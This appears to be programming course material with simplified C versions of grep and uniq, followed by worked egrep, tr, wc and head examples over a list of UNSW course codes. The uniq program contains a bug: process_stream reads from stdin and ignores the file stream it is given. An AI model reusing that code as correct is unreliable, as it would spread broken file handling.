// print lines containing the specified substring
// breaks on long lines, does not implement regexs or other grep features
void process_stream(FILE *stream, char *stream_name, char *substring) {
    char line[65536];
    int line_number = 1;
    while (fgets(line, sizeof line, stream) != NULL) {
        if (strstr(line, substring) != NULL)
            printf("%s:%d:%s", stream_name, line_number, line);
        line_number = line_number + 1;
    }
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 2)
        process_stream(stdin, "<stdin>", argv[1]);
    else
        for (int i = 2; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in, argv[i], argv[1]);
            fclose(in);
        }
    return 0;
}

Over-simple /usr/bin/uniq emulation.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_LINE 65536

// cope stream to stdout except for repeated lines
void process_stream(FILE *stream) {
    char line[MAX_LINE];
    char lastLine[MAX_LINE];
    int line_number = 0;

    while (fgets(line, MAX_LINE, stdin) != NULL) {
        if (line_number == 0 || strcmp(line, lastLine) != 0) {
            fputs(line, stdout);
            strncpy(lastLine, line, MAX_LINE);
        }
        line_number++;
    }
}

// process files given as arguments
// if no arguments process stdin
int main(int argc, char *argv[]) {
    if (argc == 1)
        process_stream(stdin);
    else
        for (int i = 1; i < argc; i++) {
            FILE *in = fopen(argv[i], "r");
            if (in == NULL) {
                fprintf(stderr, "%s: %s: ", argv[0], argv[i]);
                perror("");
                return 1;
            }
            process_stream(in);
            fclose(in);
        }
    return 0;
}
This file contains examples of the use of the most common Unix filter programs (egrep, wc, head, etc.) It also contains solutions to the exercises discussed in lectures.
  1. Consider a a file course_codes containing UNSW course codes and names.
    ls -l course_codes
    -rw-r--r-- 1 cs2041 cs2041 603446 Oct 16 22:02 course_codes
    
    wc course_codes
     18181  79223 603446 course_codes
    
    head course_codes
    ACCT1501 Accounting & Financial Mgt 1A
    ACCT1511 Accounting & Financial Mgt 1B
    ACCT2101 Industry Placement 1
    ACCT2507 Intro  to Accounting Research
    ACCT2522 Management Accounting 1
    ACCT2532 Management Accounting (Hons)
    ACCT2542 Corporate Financial Reporting
    ACCT2552 Corporate Financial Rep (Hons)
    ACCT3202 Industry Placement 2
    ACCT3303 Industry Placement 3
    
    It looks like the code is separated from the title by a number of spaces. We can check this via cat -A:
    head -5 course_codes | cat -A
    ACCT1501 Accounting & Financial Mgt 1A$
    ACCT1511 Accounting & Financial Mgt 1B$
    ACCT2101 Industry Placement 1$
    ACCT2507 Intro  to Accounting Research$
    ACCT2522 Management Accounting 1$
    
    This shows us that our initial guess was wrong, and there's actually a tab character between the course code and title (shown as ^I by cat -A). Also, the location of the end-of-line marker ($) indicates that there are no trailing spaces or tabs.

    If we need to know what COMP courses there are:

    egrep -c COMP course_codes
    191
    
    egrep COMP course_codes
    COMP0011 Fundamentals of Computing
    COMP1000 Web, Spreadsheets & Databases
    COMP1001 Introduction to Computing
    COMP1011 Computing 1A
    COMP1021 Computing 1B
    COMP1081 Harnessing the Power of IT
    COMP1091 Solving Problems with Software
    COMP1400 Programming for Designers
    COMP1711 Higher Computing 1A
    COMP1721 Higher Computing 1B
    COMP1911 Computing 1A
    COMP1917 Computing 1
    COMP1921 Computing 1B
    COMP1927 Computing 2
    COMP2011 Data Organisation
    COMP2021 Digital System Structures
    COMP2041 Software Construction
    COMP2091 Computing 2
    COMP2110 Software System Specification
    COMP2111 System Modelling and Design
    COMP2121 Microprocessors & Interfacing
    COMP2411 Logic and Logic Programming
    COMP2711 Higher Data Organisation
    COMP2811 Computing B
    COMP2911 Eng. Design in Computing
    COMP2920 Professional Issues and Ethics
    COMP3111 Software Engineering
    COMP3120 Introduction to Algorithms
    COMP3121 Algorithms & Programming Tech
    COMP3131 Programming Languages & Compil
    COMP3141 Software Sys Des&Implementat'n
    COMP3151 Foundations of Concurrency
    COMP3152 Comparative Concurrency Semant
    COMP3153 Algorithmic Verification
    COMP3161 Concepts of Programming Lang.
    COMP3171 Object-Oriented Programming
    COMP3211 Computer Architecture
    COMP3221 Microprocessors & Embedded Sys
    COMP3222 Digital Circuits and Systems
    COMP3231 Operating Systems
    COMP3241 Real Time Systems
    COMP3311 Database Systems
    COMP3331 Computer Networks&Applications
    COMP3411 Artificial Intelligence
    COMP3421 Computer Graphics
    COMP3431 Robotic Software Architecture
    COMP3441 Security Engineering
    COMP3511 Human Computer Interaction
    COMP3601 Design Project A
    COMP3710 Software Project Management
    COMP3711 Software Project Management
    COMP3720 Total Quality Management
    COMP3821 Ext Algorithms&Prog Techniques
    COMP3881 Ext Digital Circuits & Systems
    COMP3891 Ext Operating Systems
    COMP3901 Special Project A
    COMP3902 Special Project B
    COMP3931 Ext Computer Networks & App
    COMP4001 Object-Oriented Software Dev
    COMP4002 Logic Synthesis & Verification
    COMP4003 Industrial Software Developmen
    COMP4011 Web Applications Engineering
    COMP4012 Occasional Elec S2 - Comp.Eng.
    COMP4121 Advanced & Parallel Algorithms
    COMP4128 Programming Challenges
    COMP4131 Programming Language Semantics
    COMP4132 Adv. Functional Programming
    COMP4133 Advanced Compiler Construction
    COMP4141 Theory of Computation
    COMP4151 Algorithmic Verification
    COMP4161 Advanced Verification
    COMP4181 Language-based Software Safety
    COMP4211 Adv Architectures & Algorithms
    COMP4314 Next Generation Database Systs
    COMP4317 XML and Databases
    COMP4335 Wireless Mesh&Sensor Networks
    COMP4336 Mobile Data Networking
    COMP4337 Securing Wireless Networks
    COMP4411 Experimental Robotics
    COMP4412 Introduction to Modal Logic
    COMP4415 First-order Logic
    COMP4416 Intelligent Agents
    COMP4418 Knowledge Representation
    COMP4431 Game Design Workshop
    COMP4432 Game Design Studio
    COMP4442 Advanced Computer Security
    COMP4511 User Interface Design & Constr
    COMP4601 Design Project B
    COMP4903 Industrial Training
    COMP4904 Industrial Training 1
    COMP4905 Industrial Training 2
    COMP4906 Industrial Training 3
    COMP4910 Thesis Part A
    COMP4911 Thesis Part B
    COMP4913 Computer Science 4 Honours P/T
    COMP4914 Computer Science 4 Honours F/T
    COMP4920 Management and Ethics
    COMP4930 Thesis Part A
    COMP4931 Thesis Part B
    COMP4941 Thesis Part B
    COMP6714 Info Retrieval and Web Search
    COMP6721 (In-)Formal Methods
    COMP6731 Combinatorial Data Processing
    COMP6733 Internet of Things
    COMP6741 Parameterized & Exact Comp.
    COMP6752 Modelling Concurrent Systems
    COMP6771 Advanced C++ Programming
    COMP9000 Special Program
    COMP9001 E-Commerce Technologies
    COMP9008 Software Engineering
    COMP9009 Adv Topics in Software Eng
    COMP9015 Issues in Computing
    COMP9018 Advanced Graphics
    COMP9020 Foundations of Comp. Science
    COMP9021 Principles of Programming
    COMP9022 Digital Systems Structures
    COMP9024 Data Structures & Algorithms
    COMP9031 Internet Programming
    COMP9032 Microprocessors & Interfacing
    COMP9041 Software Construction
    COMP9081 Harnessing the Power of IT
    COMP9101 Design &Analysis of Algorithms
    COMP9102 Programming Lang & Compilers
    COMP9103 Algorithms & Comp. Complexity
    COMP9104 Quantum ICT
    COMP9116 S'ware Dev: B-Meth & B-Toolkit
    COMP9117 Software Architecture
    COMP9151 Foundations of Concurrency
    COMP9152 Comparative Concurrency Semant
    COMP9153 Algorithmic Verification
    COMP9161 Concepts of Programming Lang.
    COMP9171 Object-Oriented Programming
    COMP9181 Language-based Software Safety
    COMP9201 Operating Systems
    COMP9211 Computer Architecture
    COMP9221 Microprocessors & Embedded Sys
    COMP9222 Digital Circuits and Systems
    COMP9231 Integrated Digital Systems
    COMP9242 Advanced Operating Systems
    COMP9243 Distributed Systems
    COMP9244 Software View of Proc Architec
    COMP9245 Real-Time Systems
    COMP9282 Ext Micros & Interfacing
    COMP9283 Ext Operating Systems
    COMP9311 Database Systems
    COMP9313 Big Data Management
    COMP9314 Next Generation Database Systs
    COMP9315 Database Systems Implementat'n
    COMP9316 eCommerce Implementation
    COMP9317 XML and Databases
    COMP9318 Data Warehousing & Data Mining
    COMP9319 Web Data Compression & Search
    COMP9321 Web Applications Engineering
    COMP9322 Service-Oriented Architectures
    COMP9323 e-Enterprise Project
    COMP9331 Computer Networks&Applications
    COMP9332 Network Routing and Switching
    COMP9333 Advanced Computer Networks
    COMP9334 Systems Capacity Planning
    COMP9335 Wireless Mesh&Sensor Networks
    COMP9336 Mobile Data Networking
    COMP9337 Securing Wireless Networks
    COMP9414 Artificial Intelligence
    COMP9415 Computer Graphics
    COMP9416 Knowledge Based Systems
    COMP9417 Machine Learning & Data Mining
    COMP9418 Advanced Machine Learning
    COMP9431 Robotic Software Architecture
    COMP9441 Security Engineering
    COMP9444 Neural Networks
    COMP9447 Security Engineering Workshop
    COMP9511 Human Computer Interaction
    COMP9514 Advanced Decision Theory
    COMP9515 Pattern Classification
    COMP9517 Computer Vision
    COMP9518 Pattern Recognition
    COMP9519 Multimedia Systems
    COMP9520 Ext Foundations of Computer Sc
    COMP9596 Research Project
    COMP9790 Principles of GNSS Positioning
    COMP9791 Modern Navigation &Positioning
    COMP9801 Ext Design&Analysis of Algo
    COMP9814 Ext Artificial Intelligence
    COMP9833 Ext Computer Networks & Appl
    COMP9844 Ext Neural Networks
    COMP9901 P/T Res. Thesis Comp Sci & Eng
    COMP9902 Res. Thesis Comp Sci & Eng F/T
    COMP9910 Mgt&Com Skills-CompSci&Eng Res
    COMP9912 Project (24 UOC)
    COMP9930 Readings in Comp Sci and Eng
    COMP9945 Research Project
    
    Either of the two commands below tell us which courses have "comp" in their name or code (in upper or lower case).
    tr A-Z a-z <course_codes | egrep comp
    aciv2518 eng computational methods 1
    acsc1600 computer science 1
    acsc1800 computer science 1e
    acsc2015 interactive computer graphics
    acsc2020 computer science core b2
    acsc2021 computer systems architectrue 2
    acsc2107 computer languages b
    acsc2601 computer science 2a
    acsc2602 computer science 2b
    acsc2802 computer science 2ee
    acsc3003 computer project
    acsc3029 computing project 3
    acsc3030 cryptography & computer securi
    acsc3601 computer science 3a
    acsc3603 computer science 3c
    acsc4191 computer science 4 (hons) f/t
    acsc7304 computer graphics
    acsc7306 computer speech processing
    acsc7336 computer security
    acsc8248 computer graphics (12 cpt)
    acsc9000 computer science research f/t
    acsc9001 computer science research p/t
    aele2007 computer design
    aele2508 microcomputer interfacing
    aele3031 microcomputer interfacing
    aele4511 computer control theory
    amat3107 complex variables
    amat3401 complex analysis 3e
    amat3503 complex variables e
    amec3512 pumps, turbines & compressors
    ance8001 computational mathematics
    ance8002 supercomputing techniques
    ance9105 comp techniques fluid dynamics
    aphy3028 computational physics
    arch1391 digital computation studio
    arch5202 computer applications 2
    arch5203 computer applications 3
    arch5205 theory of architectural computin
    arch5220 computer graphics programming 1
    arch5221 computer graphics programming 2
    arch5223 computer applications 2
    arch5940 theory of architectural computin
    arch5942 arctitectural computing seminar
    arch5943 theory of architectural computin
    arch6201 architectural computing 1
    arch6205 architectural computing 2
    arch6214 architectural computing 2
    arch7204 design computing theory
    arch7205 computer graphics programming
    arts2301 computers, brains & minds
    atax0002 computer information systems
    atax0053 acct for complex struct & inst
    atax0324 gst: complex issues & planning
    atax0341 comparative tax systems
    atax0424 gst: complex issues & planning
    atax0441 comparative tax systems
    atax0524 gst: complex issues & planning
    atax0641 comparative tax systems
    aust2003 aborig. studies: a global compar
    aven1500 computing for aviation
    beil0003 be annual design competition
    beil0004 design competitions and bids
    benv1141 computers and information tech
    benv1242 computer-aided design
    benv2405 computer graphics programming
    binf3020 computational bioinformatics
    binf9020 computational bioinformatics
    biom5912 comp thesis b&c
    biom5920 thesis part a (comp)
    biom5921 thesis part b (comp)
    biom9332 biocompatibility
    biom9501 computing for biomedical eng
    biom9601 biomed applic.of microcomp 1
    biom9602 biomed applic.of microcomp 2
    bios3021 comparative animal physiology
    bldg2281 introduction to computing
    bldg3282 computer apps in building
    bldg3482 computer aplications in constr
    ceic5310 computing studies in the process
    ceic8310 computing studies proc ind
    ceic8335 adv computer methods
    chem3031 inorg chem:trans metals & comp
    chem3640 computers in chemistry
    civl1015 computing
    civl1106 computing & graphics
    civl3015 engineering computations
    civl3106 engineering computations
    cmed9517 adv biostatistic & stat comp
    code1110 computational design theory 1
    code1210 computational design theory 2
    code2110 computational design theory 3
    code2120 computational sustainability
    code2121 advanced computational design
    cofa2682 multi-media computing unit 3
    cofa3681 multi-media computing elective 1
    cofa5116 design & computers
    cofa5130 typography & composition
    cofa5216 design & computers 1
    cofa5240 design & computers 2 cad
    cofa5241 design & computers 2 graphics
    cofa5338 design & computers 3 - cad
    cofa5339 design & computers 3 - graphic
    cofa8670 intro to multi-media computing
    comd2040 of tigers & pussycats: a compa
    comp0011 fundamentals of computing
    comp1000 web, spreadsheets & databases
    comp1001 introduction to computing
    comp1011 computing 1a
    comp1021 computing 1b
    comp1081 harnessing the power of it
    comp1091 solving problems with software
    comp1400 programming for designers
    comp1711 higher computing 1a
    comp1721 higher computing 1b
    comp1911 computing 1a
    comp1917 computing 1
    comp1921 computing 1b
    comp1927 computing 2
    comp2011 data organisation
    comp2021 digital system structures
    comp2041 software construction
    comp2091 computing 2
    comp2110 software system specification
    comp2111 system modelling and design
    comp2121 microprocessors & interfacing
    comp2411 logic and logic programming
    comp2711 higher data organisation
    comp2811 computing b
    comp2911 eng. design in computing
    comp2920 professional issues and ethics
    comp3111 software engineering
    comp3120 introduction to algorithms
    comp3121 algorithms & programming tech
    comp3131 programming languages & compil
    comp3141 software sys des&implementat'n
    comp3151 foundations of concurrency
    comp3152 comparative concurrency semant
    comp3153 algorithmic verification
    comp3161 concepts of programming lang.
    comp3171 object-oriented programming
    comp3211 computer architecture
    comp3221 microprocessors & embedded sys
    comp3222 digital circuits and systems
    comp3231 operating systems
    comp3241 real time systems
    comp3311 database systems
    comp3331 computer networks&applications
    comp3411 artificial intelligence
    comp3421 computer graphics
    comp3431 robotic software architecture
    comp3441 security engineering
    comp3511 human computer interaction
    comp3601 design project a
    comp3710 software project management
    comp3711 software project management
    comp3720 total quality management
    comp3821 ext algorithms&prog techniques
    comp3881 ext digital circuits & systems
    comp3891 ext operating systems
    comp3901 special project a
    comp3902 special project b
    comp3931 ext computer networks & app
    comp4001 object-oriented software dev
    comp4002 logic synthesis & verification
    comp4003 industrial software developmen
    comp4011 web applications engineering
    comp4012 occasional elec s2 - comp.eng.
    comp4121 advanced & parallel algorithms
    comp4128 programming challenges
    comp4131 programming language semantics
    comp4132 adv. functional programming
    comp4133 advanced compiler construction
    comp4141 theory of computation
    comp4151 algorithmic verification
    comp4161 advanced verification
    comp4181 language-based software safety
    comp4211 adv architectures & algorithms
    comp4314 next generation database systs
    comp4317 xml and databases
    comp4335 wireless mesh&sensor networks
    comp4336 mobile data networking
    comp4337 securing wireless networks
    comp4411 experimental robotics
    comp4412 introduction to modal logic
    comp4415 first-order logic
    comp4416 intelligent agents
    comp4418 knowledge representation
    comp4431 game design workshop
    comp4432 game design studio
    comp4442 advanced computer security
    comp4511 user interface design & constr
    comp4601 design project b
    comp4903 industrial training
    comp4904 industrial training 1
    comp4905 industrial training 2
    comp4906 industrial training 3
    comp4910 thesis part a
    comp4911 thesis part b
    comp4913 computer science 4 honours p/t
    comp4914 computer science 4 honours f/t
    comp4920 management and ethics
    comp4930 thesis part a
    comp4931 thesis part b
    comp4941 thesis part b
    comp6714 info retrieval and web search
    comp6721 (in-)formal methods
    comp6731 combinatorial data processing
    comp6733 internet of things
    comp6741 parameterized & exact comp.
    comp6752 modelling concurrent systems
    comp6771 advanced c++ programming
    comp9000 special program
    comp9001 e-commerce technologies
    comp9008 software engineering
    comp9009 adv topics in software eng
    comp9015 issues in computing
    comp9018 advanced graphics
    comp9020 foundations of comp. science
    comp9021 principles of programming
    comp9022 digital systems structures
    comp9024 data structures & algorithms
    comp9031 internet programming
    comp9032 microprocessors & interfacing
    comp9041 software construction
    comp9081 harnessing the power of it
    comp9101 design &analysis of algorithms
    comp9102 programming lang & compilers
    comp9103 algorithms & comp. complexity
    comp9104 quantum ict
    comp9116 s'ware dev: b-meth & b-toolkit
    comp9117 software architecture
    comp9151 foundations of concurrency
    comp9152 comparative concurrency semant
    comp9153 algorithmic verification
    comp9161 concepts of programming lang.
    comp9171 object-oriented programming
    comp9181 language-based software safety
    comp9201 operating systems
    comp9211 computer architecture
    comp9221 microprocessors & embedded sys
    comp9222 digital circuits and systems
    comp9231 integrated digital systems
    comp9242 advanced operating systems
    comp9243 distributed systems
    comp9244 software view of proc architec
    comp9245 real-time systems
    comp9282 ext micros & interfacing
    comp9283 ext operating systems
    comp9311 database systems
    comp9313 big data management
    comp9314 next generation database systs
    comp9315 database systems implementat'n
    comp9316 ecommerce implementation
    comp9317 xml and databases
    comp9318 data warehousing & data mining
    comp9319 web data compression & search
    comp9321 web applications engineering
    comp9322 service-oriented architectures
    comp9323 e-enterprise project
    comp9331 computer networks&applications
    comp9332 network routing and switching
    comp9333 advanced computer networks
    comp9334 systems capacity planning
    comp9335 wireless mesh&sensor networks
    comp9336 mobile data networking
    comp9337 securing wireless networks
    comp9414 artificial intelligence
    comp9415 computer graphics
    comp9416 knowledge based systems
    comp9417 machine learning & data mining
    comp9418 advanced machine learning
    comp9431 robotic software architecture
    comp9441 security engineering
    comp9444 neural networks
    comp9447 security engineering workshop
    comp9511 human computer interaction
    comp9514 advanced decision theory
    comp9515 pattern classification
    comp9517 computer vision
    comp9518 pattern recognition
    comp9519 multimedia systems
    comp9520 ext foundations of computer sc
    comp9596 research project
    comp9790 principles of gnss positioning
    comp9791 modern navigation &positioning
    comp9801 ext design&analysis of algo
    comp9814 ext artificial intelligence
    comp9833 ext computer networks & appl
    comp9844 ext neural networks
    comp9901 p/t res. thesis comp sci & eng
    comp9902 res. thesis comp sci & eng f/t
    comp9910 mgt&com skills-compsci&eng res
    comp9912 project (24 uoc)
    comp9930 readings in comp sci and eng
    comp9945 research project
    crim3010 comparative criminal justice
    cven1015 computing
    cven1025 computing
    cven2002 engineering computations
    cven2025 engineering computations 1
    cven2702 engineering computations
    cven3025 engineering computations 2
    cven4307 steel & composite structures
    cven8827 composite steel-concrete struc
    cven9820 computational struct mechanics
    cven9822 steel & composite structures
    cven9827 composite steel-concrete struc
    danc2000 dance analysis & composition 1
    danc2005 dance analysis & composition 2
    danc2015 dance analysis & composition 3
    econ3213 comparative forecasting techs
    econ5122 compet. in the know. econ.
    econ5255 computational stats & econ mod
    edst1492 computer skills for teachers
    edst4092 computer skills for teachers
    edst4157 computing studies method 1
    edst4158 computing studies method 2
    elec4343 source coding & compression
    elec4432 computer control & instrumenta
    elec4632 computer control systems
    elec9401 computer control systems 1
    elec9402 computer control systems 2
    elec9403 real time computing & control
    elec9733 real computing and control
    engg1811 computing for engineers
    euro2302 the messiah complex
    fins5553 insur. comp. oper. & manage.
    fndn0301 computing studies
    fndn0302 computing studies and research
    fndn0311 computing studies - t
    food4220 computer applications
    food4320 computer applications
    food4537 computing in food science
    food9101 complex fluid micro & rheology
    gbat9131 leadership in a complex enviro
    gend1212 analysing a picture:comp.&des.
    gend4201 design and computing
    gene8001 computer game design
    genm0515 computers for professionals
    genp0515 computers for professionals
    gens2001 the computer
    gens5525 the comp: its impact, sign'fcnce
    gent0407 tv soaps: a comparative study
    gent0603 the computer: impact, significan
    gent0802 the complexity of everyday life
    gent1003 computers into the 21st c
    geog3161 computer mapping & data displa
    geog3861 computer mapping
    geog9014 computer mapping &data display
    geog9210 computer mapping & data displa
    geol0300 computing & stats for geol
    geol2041 geological computing
    gmat1111 introduction to computing
    gmat1150 survey methods& computations
    gmat1300 comp appl in geomatics
    gmat2111 principles of computer processin
    gmat2112 principles of computer processin
    gmat2122 computer graphics 1
    gmat2131 survey computations
    gmat2350 comp for spatial info sciences
    gmat2500 surveying computations a
    gmat2550 surveying computations b
    gmat3111 survey computations
    gmat3122 computer graphics 1
    gmat3231 geodetic computations
    gmat4111 data analysis & computing 1
    gmat4112 data analysis & computing 1
    gmat5111 data analysis & computing 2
    gmat5112 data analysis & computing 2
    gmat5122 computer graphics 2
    heal9471 comparative h'lth care systems
    heal9501 comp tech for health serv mngt
    hist2487 the messiah complex
    hpsc2610 computers, brains & minds
    hpst2004 computers, brains & minds
    hpst2109 computers, brains & minds
    ides2121 introduction to computing
    ides3101 design studio 5: complexity
    ides3231 adv computer aided product des
    ides5153 computer graphic applications
    ides5154 computer aided design
    iest5009 competencies in sustainability
    iest5010 competencies in sustainability
    ilas0232 computer prog'mng for info. appl
    ilas0233 computing applications in the in
    infs3607 distributed computer systems
    irob5732 spec topic- internat & comp ir
    irob5734 adv seminar-internat & comp ir
    jurd7348 harry gibbs moot comp 6uoc
    jurd7419 competition law and policy
    jurd7473 asian competition law
    jurd7474 competition law and ip
    jurd7489 complex civil litigation
    jurd7522 competition law
    jurd7559 int'l&comparative law w'shop
    jurd7610 mediation competition
    jurd7616 international & comparative ip
    jurd7648 transitional justice intl comp
    jurd7989 comparative anti-terrorism law
    jwst2104 the messiah complex
    land1131 introduction to computer applica
    laws1032 computer applications to law
    laws2065 comparative law
    laws2085 comparative law
    laws2110 comparative constitutional law
    laws2148 harry gibbs moot comp 8uoc
    laws2410 mediation competition
    laws2589 complex civil litigation
    laws3009 comparative criminal justice:
    laws3022 competition law
    laws3035 developing comp apps to law
    laws3051 telecomm. competition & cons.
    laws3148 harry gibbs moot comp
    laws3159 int'l&comparative law w'shop
    laws3348 transitional justice intl comp
    laws3510 mediation competition
    laws3589 complex civil litigation
    laws4016 international & comparative ip
    laws4019 competition law
    laws4089 comparative anti-terrorism law
    laws4120 themes in asian & compar. law
    laws4133 issues in asian & comp law
    laws4291 comparative constitutional law
    laws4620 computer applications to law
    laws4765 complex commercial litigation
    laws5234 competition law and regulation
    laws7003 global issues in comp policy
    laws8016 international & comparative ip
    laws8073 asian competition law
    laws8074 competition law and ip
    laws8118 legal systems in comp persp
    laws8143 comparative patent law
    laws8144 comparative trade mark law
    laws8219 competition law and policy
    laws8289 comparative anti-terrorism law
    laws8348 transitional justice intl comp
    laws8765 complex commercial litigation
    laws9973 comparative law
    laws9984 int. & comp. indigenous law
    legt5531 comp. bus. & legal strategies
    legt5602 tax admin. & compliance
    libs0233 computer applications in the inf
    manf3500 computers in manufacturing 1
    manf4500 computers in manufacturing 2
    manf4601 comp aided production mgmt a
    manf4602 comp aided production mgmt b
    manf8560 computer integrated manufact.
    manf9500 computer-aided progrmg for numcl
    manf9543 comp aided design/manufacture
    manf9560 computer integrated manufact.
    mark3022 computer applications in marketi
    math1061 introductory applied computing
    math2301 mathematical computing
    math2430 symbolic computing
    math2520 complex analysis
    math2521 complex analysis
    math2620 higher complex analysis
    math2621 higher complex analysis
    math2810 statistical computing
    math2910 higher statistical computing
    math3101 computational mathematics
    math3301 advanced math computing
    math3311 math computing for finance
    math3400 logic & computability
    math3421 logic and computability
    math3430 symbolic computing
    math3680 higher complex analysis
    math3790 higher computat. combinatorics
    math3800 statistical computation 1
    math3810 statistical computation 2
    math3821 stat modelling & computing
    math3871 bayesian inference and comp
    math4003 maths and comp sci honours f/t
    math4004 maths and comp sci honours p/t
    math5009 comp'l coursework thesis ft
    math5010 comp'l coursework thesis pt
    math5305 computational mathematics
    math5315 high perf numerical computing
    math5335 comput'l methods for finance
    math5400 logic & computability
    math5505 computational combinatorics
    math5685 complex analysis
    math5856 intro to stats and stat comput
    math5960 bayesian inference & comput'n
    math9315 topics in mathematical computing
    mats1021 computing in materials science
    mats1264 fibre reinforced plastic composi
    mats3064 composite materials
    mats4005 composites and functional mats
    mats5342 comp modelling & design
    mats6110 computational materials
    mbax9131 leadership in a complex enviro
    mech1500 computing 1m
    mech3500 computing 2m
    mech3510 computing applications in mech.
    mech3530 computing applcts in mechanical
    mech3540 computational engineering
    mech4130 computer-aided engineering desig
    mech4150 design & maintenance of componen
    mech4500 computing 3m
    mech4620 computational fluid dynamics
    mech8620 computational fluid dynamics
    mech9150 design & maintenance of componen
    mech9420 composite materials and mechan
    mech9620 computational fluid dynamics
    meft5103 computer media
    mgmt2106 comparative management systems
    mgmt5050 teams, ethics & comp adv
    mgmt5802 comp. adv. through people
    mine0710 computing 1
    mine1720 microcomputers (mining)
    mine1730 computer applications in mining
    mine4082 computational methods
    mine4810 comp methods in geomechanics
    mtrn2500 comp for mtrn
    mtrn3500 comp appl in mechatonic sys
    mtrn3530 computing applcts in mech.sys.
    pfst2000 dance analysis & composition 1
    pfst2005 dance analysis & composition 2
    pfst2011 performance composition
    phar9121 postmarketing compliance meds
    phcm9471 comparative h'lth care systems
    phil5206 ai & computer science
    phil5207 ai & computer science 2a
    phys1601 comp. applic'ns in exp. sci. 1
    phys2001 mechanics & computational phys
    phys2020 computational physics
    phys2120 mechanics and computational
    phys2601 computer applications 2
    phys3601 computer applications in instrum
    phys3610 computational physics
    phys3620 computer based signal processing
    plan1061 computer literacy
    pols2016 concepts in comparative pol cult
    pols3953 comparative politics: russia
    psyc3191 computer science & psychology
    ptrl1013 computing-petroleum engineers
    ptrl4013 well completion & stimulation
    ptrl5016 well completions & stimulation
    ptrl6016 well completions & stimulation
    regs0044 comp law in global context
    regs0115 compliance: financial service
    regs0218 compliance: financial services
    regs0428 computer applications in linguis
    regs0453 multiple regress. & stat comp
    regs0474 comparative international tax
    regs0633 comparative corp & comm law
    regs0638 international comparative corp
    regs0718 energy co-compliance in bldgs
    regs3092 comp cntrl of machines & proc
    regs3265 intl and comparative ind. rel.
    regs3410 computer networks
    regs3873 introduction to computer graphic
    regs3909 trade marks & unfair comp
    regs3948 competition law
    regs4045 competition reg. of mergers
    regs5618 comp integrated manufacturing
    regs7726 composites & multiphase polyme
    regs7908 service managing for comp.adv.
    sart1608 digital composite 1
    sart1681 multimedia computing elective1
    sart1810 introduction to computing
    sart2608 digital composite 2
    sart2681 multimedia computing elective2
    sart2811 multimedia computing workshop
    sart2835 composition and design
    sart3608 digital composite 3
    sart3681 multimedia computing elective3
    sart3840 advanced multimedia computing
    sart9725 intro to multimedia computing
    sart9739 multimedia computing elective
    sart9741 composition and design
    sdes1106 design and computers 1
    sdes1110 design and computers 2
    sdes1111 integrated design computing 1
    sdes1211 integrated design computing 2
    sdes1601 colour,composition &typography
    sdes2107 design and computers 3
    sdes2115 design and computers 2b
    sdes3107 design and computers 4
    sdes3173 advanced computer graphics
    sdes4103 design and computers 4
    sdes6714 intro 3d computer aided design
    slsp2902 computers and comm.
    soca3314 the messiah complex
    soci3401 computer analysis of social data
    soci3408 computer analysis of social data
    soma1608 digital composite
    soma1681 intro multimedia computing
    soma1810 introduction to computing
    soma2402 tangible computing
    soma2608 digital composite 2
    soma2681 advanced multimedia computing
    soma2811 multimedia computing workshop
    soma3415 compositional project
    soma3608 digital composite 3
    surv1111 introduction to computing
    surv2111 principles of computer processin
    surv2122 computer graphics 1
    surv3111 survey computations
    surv3231 geodetic computations
    surv4111 data analysis & computing 1
    surv5111 data analysis & computing 2
    surv5122 computer graphics 2
    surv6121 computer graphics
    tabl1002 computer information systems
    tabl2053 acct for complex struct & inst
    tabl3044 comparative tax systems
    tabl5544 comparative tax systems
    tedg1101 computers in education
    tedg1106 computer-based resources: design
    tedg1107 managing with computers in schoo
    tedg1112 computers - gifted & talented st
    tedg1113 computer control technology in e
    teed1134 fundamentals of computing
    teed2119 computers & people
    tele4343 source coding and compression
    tele9302 computer networks
    text2501 computing applications
    zacm3011 component design
    zacm3433 compressible flow
    zacm4020 computational structures
    zacm4031 compressible flow
    zacm4913 eng app of comp fluid dynamics
    zbus2200 markets and competition
    zeit1101 computational problem solving
    zeit1110 computer games
    zeit2102 computer technology
    zeit2305 computer games
    zeit3113 computer languages & algorithm
    zeit3304 computing proj - info sys
    zeit3307 computer games
    zeit4003 computational fluid dynamics
    zeit7101 computational problem solving
    zeit8020 computer network operations
    zeit8028 computer forensics
    zeit9100 computer science research f/t
    zeit9101 computer science research p/t
    zgen2300 computers in society
    zgen2301 computer games
    zhss8431 comparative defence planning
    zint1001 eng comp methods 1
    zite1001 computer tools for engineers
    zite1101 intro to computer science
    zite2101 computer languages & algorithm
    zite2102 computer technology
    zite3101 computing proj - comp sci
    zite3105 human computer interaction
    zite3106 interactive computer graphics
    zite3113 computer languages & algorithm
    zite3211 microcomputer interfacing
    zite3304 computing proj - info sys
    zite4101 computer sci 4 (comb hons) f/t
    zite4102 computer sci 4 (comb hon) p/t
    zite4103 computer science 4 (hons) f/t
    zite4104 computer science 4 (hons) p/t
    zite8103 computer graphics
    zite8104 computer security
    zite8105 computer speech processing
    zite8145 softcomp
    zite9100 computer science research f/t
    zite9101 computer science research p/t
    zpem3302 complex variables
    
    egrep -i comp course_codes
    ACIV2518 Eng Computational Methods 1
    ACSC1600 Computer Science 1
    ACSC1800 Computer Science 1E
    ACSC2015 Interactive Computer Graphics
    ACSC2020 Computer Science Core B2
    ACSC2021 Computer Systems Architectrue 2
    ACSC2107 Computer Languages B
    ACSC2601 Computer Science 2A
    ACSC2602 Computer Science 2B
    ACSC2802 Computer Science 2EE
    ACSC3003 Computer Project
    ACSC3029 Computing Project 3
    ACSC3030 Cryptography & Computer Securi
    ACSC3601 Computer Science 3A
    ACSC3603 Computer Science 3C
    ACSC4191 Computer Science 4 (Hons) F/T
    ACSC7304 Computer Graphics
    ACSC7306 Computer Speech Processing
    ACSC7336 Computer Security
    ACSC8248 Computer Graphics (12 Cpt)
    ACSC9000 Computer Science Research F/T
    ACSC9001 Computer Science Research P/T
    AELE2007 Computer Design
    AELE2508 Microcomputer Interfacing
    AELE3031 Microcomputer Interfacing
    AELE4511 Computer Control Theory
    AMAT3107 Complex Variables
    AMAT3401 Complex Analysis 3E
    AMAT3503 Complex Variables E
    AMEC3512 Pumps, Turbines & Compressors
    ANCE8001 Computational Mathematics
